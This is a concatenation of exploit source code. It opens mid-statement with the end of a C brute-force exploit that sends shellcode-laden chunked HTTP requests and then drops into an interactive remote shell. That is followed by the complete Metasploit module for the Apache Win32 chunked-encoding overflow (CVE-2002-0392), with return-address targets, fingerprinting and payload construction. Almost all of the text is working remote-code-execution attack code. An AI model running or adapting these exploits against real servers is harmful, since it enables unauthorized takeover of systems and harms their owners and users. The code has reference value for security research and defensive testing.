= 0, progress = 0;;victim.retaddr += RET_ADDR_INC) { /* skip invalid return adresses */ if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4)) continue; sock = socket(PF_INET, SOCK_STREAM, 0); sin.sin_family = PF_INET; sin.sin_addr.s_addr = ia.s_addr; sin.sin_port = htons(atoi(portp)); if(!progress) printf("[*] Connecting.. "); fflush(stdout); if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) { perror("connect()"); exit(1); } if(!progress) printf("connected!\n"); p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE) + ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero + 1024) * REP_POPULATOR)); PUT_STRING("GET / HTTP/1.1\r\nHost: " HOST_PARAM "\r\n"); for (i = 0; i < REP_SHELLCODE; i++) { PUT_STRING("X-"); PUT_BYTES(PADSIZE_3, PADDING_3); PUT_STRING(": "); PUT_BYTES(NOPCOUNT, NOP); memcpy(p, shellcode, sizeof(shellcode) - 1); p += sizeof(shellcode) - 1; PUT_STRING("\r\n"); } for (i = 0; i < REP_POPULATOR; i++) { PUT_STRING("X-"); PUT_BYTES(PADSIZE_1, PADDING_1); PUT_STRING(": "); for (j = 0; j < victim.repretaddr; j++) { *p++ = victim.retaddr & 0xff; *p++ = (victim.retaddr >> 8) & 0xff; *p++ = (victim.retaddr >> 16) & 0xff; *p++ = (victim.retaddr >> 24) & 0xff; } PUT_BYTES(victim.repzero, 0); PUT_STRING("\r\n"); } PUT_STRING("Transfer-Encoding: chunked\r\n"); snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2); PUT_STRING(buf); PUT_BYTES(PADSIZE_2, PADDING_2); snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", victim.delta); PUT_STRING(buf); if(!shown_length) { printf("[*] Exploit output is %u bytes\n", (unsigned int)(p - expbuf)); shown_length = 1; } write(sock, expbuf, p - expbuf); progress++; if((progress%70) == 0) progress = 1; if(progress == 1) { printf("\r[*] Currently using retaddr 0x%lx", victim.retaddr); for(i = 0; i < 40; i ++) printf(" "); printf("\n"); if(bruteforce) putchar(';'); } else putchar(((rand()>>8)%2)? 'P': 'p'); fflush(stdout); responses = 0; while (1) { fd_set fds; int n; struct timeval tv; tv.tv_sec = sc_timeout; tv.tv_usec = 0; FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(sock, &fds); memset(buf, 0, sizeof(buf)); if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0) { if(FD_ISSET(sock, &fds)) { if((n = read(sock, buf, sizeof(buf) - 1)) < 0) break; if(n >= 1) { if(!owned) { for(i = 0; i < n; i ++) if(buf[i] == 'G') responses ++; else responses = 0; if(responses >= 2) { owned = 1; write(sock, "O", 1); write(sock, cmdz, strlen(cmdz)); printf(" it's a TURKEY: type=%s, delta=%d, retaddr=0x%lx, repretaddr=%d, repzero=%d\n", victim.type, victim.delta, victim.retaddr, victim.repretaddr, victim.repzero); printf("Experts say this isn't exploitable, so nothing will happen now: "); fflush(stdout); } } else write(1, buf, n); } } if(FD_ISSET(0, &fds)) { if((n = read(0, buf, sizeof(buf) - 1)) < 0) exit(1); write(sock, buf, n); } } if(!owned) break; } free(expbuf); close(sock); if(owned) return 0; if(!bruteforce) { fprintf(stderr, "Ooops.. hehehe!\n"); return -1; } } return 0; }

## # $Id: apache_chunked.rb 9719 2010-07-07 17:38:59Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache/ ] } include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Apache Win32 Chunked Encoding', 'Description' => %q{ This module exploits the chunked transfer integer wrap vulnerability in Apache version 1.2.x to 1.3.24. This particular module has been tested with all versions of the official Win32 build between 1.3.9 and 1.3.24. Additionally, it should work against most co-branded and bundled versions of Apache (Oracle 8i, 9i, IBM HTTPD, etc). You will need to use the Check() functionality to determine the exact target version prior to launching the exploit. The version of Apache bundled with Oracle 8.1.7 will not automatically restart, so if you use the wrong target value, the server will crash. }, 'Author' => [ 'hdm', 'jduck' ], 'Version' => '$Revision: 9719 $', 'References' => [ [ 'CVE', '2002-0392' ], [ 'OSVDB', '838'], [ 'BID', '5033' ], [ 'URL', 'http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html'], ], 'Privileged' => true, 'Platform' => 'win', 'Payload' => { 'Space' => 987, 'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20", 'MinNops' => 200, 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Targets' => [ [ 'Windows Generic Bruteforce', {} ], # Official Apache.org win32 builds [ 'Apache.org Build 1.3.9->1.3.19', { 'Ret' => 0x00401151, 'Pad' => [6,2,0,4,1,3,5,7] } ], [ 'Apache.org Build 1.3.22->1.3.24', { 'Ret' => 0x00401141, 'Pad' => [2,6,0,4,1,3,5,7] } ], [ 'Apache.org Build 1.3.19->1.3.24', { 'Ret' => 0x6ff6548d, 'Pad' => [2,6,0,4,1,3,5,7] } ], [ 'Apache.org Build 1.3.22', { 'Ret' => 0x6ff762ac, 'Pad' => [2,6,0,4,1,3,5,7] } ], # Return to Win9xConHook.dll via call ebx [ 'Apache.org Build 1.3.17->1.3.24 (Windows 2000)', { 'Ret' => 0x1c0f13e5, 'Pad' => [2,6,0,4,1,3,5,7] } ], # Return to Win9xConHook.dll via call esi [ 'Apache.org Build 1.3.17->1.3.24 (Windows NT)', { 'Ret' => 0x1c0f1033, 'Pad' => [2,6,0,4,1,3,5,7] } ], # Interesting return to PEB trick for Windows 2003 systems... [ 'Windows 2003 English SP0', { 'Ret' => 0x7ffc0638, 'Pad' => [2,6,5,4,1,3,0,7] } ], # Pop/Pop/Return on Windows 2000 [ 'Windows 2000 English', { 'Ret' => 0x75022ac4, 'Pad' => [2,6,5,4,1,3,0,7] } ], # Oracle HTTPD: [ 8.1.7 ] (one shot) # Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 # OpenSSL/0.9.5a mod_perl/1.24 [ 'Oracle 8.1.7 Apache 1.3.12', { 'Ret' => 0x1d84d42c, 'Pad' => [7] } ], # Oracle HTTPD: [ 9.1.0 ] (multiple shots) # Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 # OpenSSL/0.9.5a mod_perl/1.24 [ 'Oracle 9.1.0 Apache 1.3.12', { 'Ret' => 0x10016061, 'Pad' => [5,6,0,4,1,3,2,7] } ], # Oracle HTTPD: [ 9.2.0 ] (multiple shots) # Oracle HTTP Server Powered by Apache/1.3.22 (Win32) # mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b # mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25 [ 'Oracle 9.2.0 Apache 1.3.22', { 'Ret' => 0x6ff6427a, 'Pad' => [5,6,0,4,1,3,2,7] } ], # Generic debugging targets [ 'Debugging Target', { 'Ret' => 0xcafebabe, 'Pad' => [0,1,2,3,4,5,6,7] } ] ], 'DisclosureDate' => 'Jun 19 2002', 'DefaultTarget' => 0)) end def check response = send_request_raw({'uri' => '/'}, 5) if response.nil? print_status("No response to request") return Exploit::CheckCode::Safe end http_fingerprint({ :response => response }) # Custom Server header matching code = Exploit::CheckCode::Appears case response['Server'] when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22" print_status("This looks like an Oracle 8.1.7 Apache service (one-shot only)") when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24" print_status("This looks like an Oracle 9.1.0 Apache service (multiple tries allowed)") when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25" print_status("This looks like an Oracle 9.2.0 Apache service (multiple tries allowed)") when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/ print_status("IBM backported the patch, this system is not vulnerable") code = Exploit::CheckCode::Safe when /Apache(-AdvancedExtranetServer)?\/(1\.([0-2]\.[0-9]|3\.([0-9][^0-9]|[0-1][0-9]|2[0-5]))|2\.0.([0-9][^0-9]|[0-2][0-9]|3[0-8]))/ else code = Exploit::CheckCode::Safe end if code == Exploit::CheckCode::Appears print_status("Vulnerable server: #{response['Server']}") else print_status("Server is probably not vulnerable: #{response['Server']}") end return code end def auto_target response = send_request_raw({'uri' => '/'}, 5) if response.nil? print_error("No response to request") return targets_to_try end http_fingerprint({ :response => response }) # Custom Server header matching / automatic target selection targets_to_try = [] server_hdr = response['Server'] print_status("Server: #{server_hdr}") case server_hdr when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22" targets_to_try.push(targets[9]) when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24" targets_to_try.push(targets[10]) when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25" targets_to_try.push(targets[11]) when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/ # fall through else # check for apache version ranges if (server_hdr =~ /Apache\/([^ ]*)/) or (server_hdr =~ /Apache-AdvancedExtranetServer\/([^ ]*)/) version = $1 #print_status("Apache version: #{version}") ver = version.split('.') if (ver.length == 3) major = ver[0].to_i minor = ver[1].to_i rev = ver[2].to_i if (major == 1 and minor == 3) targets_to_try.push(targets[1]) if (rev >= 9 and rev <= 19) targets_to_try.push(targets[2]) if (rev >= 22 and rev <= 24) targets_to_try.push(targets[3]) if (rev >= 19 and rev <= 24) targets_to_try.push(targets[4]) if (rev == 22) # Add the remaining targets, regardless of quality... if (server_hdr =~ /Win32/) # targets 4, 5, 6, 7 if (rev >= 17 and rev <= 24) targets_to_try.push(targets[5]) targets_to_try.push(targets[6]) end targets_to_try.push(targets[7]) targets_to_try.push(targets[8]) end end # Version 1.0 - 1.2, Fall through... end # ServerTokens setting isn't giving up enough information ... Might need to try? end # Not Apache? Fall through... end targets_to_try end # # If auto, ask the auto_target function for a list of # targets to try... # # If not auto, just try the selected target. # def exploit if target_index == 0 targs = auto_target print_status("Auto-targeting returned #{targs.length} candidates...") targs.each_with_index { |targ, idx| # Never try the debug target automatically :) next if targ.name =~ /Debug/ exploit_target(targ) } else exploit_target(target) end end def exploit_target(target) target['Pad'].each { |pad| pattern = rand_text_alphanumeric(3936) + payload.encoded + make_nops(6) + "\xe9" + [-900].pack('V') + "pP" + rand_text_alphanumeric(pad) # Move slightly further back to allow padding changes pattern += "\xeb\xf0\xde\xad" + [target.ret].pack('V') # Create a chain of return addresses and reverse jumps 254.times { |x| pattern += "\xeb\xf6\xbe\xef" + [target.ret].pack('V') } # Even out the request length based on the padding value # This is required to reliably hit the return address offset pattern += rand_text_alphanumeric(8 - pad) # # Regardless of what return we hit, execution jumps backwards to the shellcode: # _______________ _______________ ___________ # _________ _____________ | ________ | | ______ | | ______ # v | v | v v | | v v | | v v | # [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret] # print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]") # Build the request send_request_raw({ 'uri' => '/', 'headers' => { 'Transfer-Encoding' => "CHUNKED" }, 'data' => "FFFFFFF0 " + pattern, }, 2) # Check the handler handler } end end